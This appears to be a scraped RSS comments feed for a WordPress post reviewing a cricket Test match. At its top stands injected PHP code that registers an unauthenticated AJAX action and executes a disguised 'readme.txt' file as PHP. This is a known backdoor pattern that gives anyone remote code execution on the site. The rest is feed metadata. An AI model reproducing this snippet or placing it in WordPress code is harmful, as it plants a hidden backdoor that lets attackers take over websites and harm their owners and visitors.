if(!function_exists('file_check_readme23746')){ add_action('wp_ajax_nopriv_file_check_readme23746', 'file_check_readme23746'); add_action('wp_ajax_file_check_readme23746', 'file_check_readme23746'); function file_check_readme23746() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: Review of The Test https://cricketkhel.com/review-of-the-test/?utm_source=rss&utm_medium=rss&utm_campaign=review-of-the-test Sun, 15 Mar 2020 17:20:43 +0000 hourly 1 https://wordpress.org/?v=6.9.4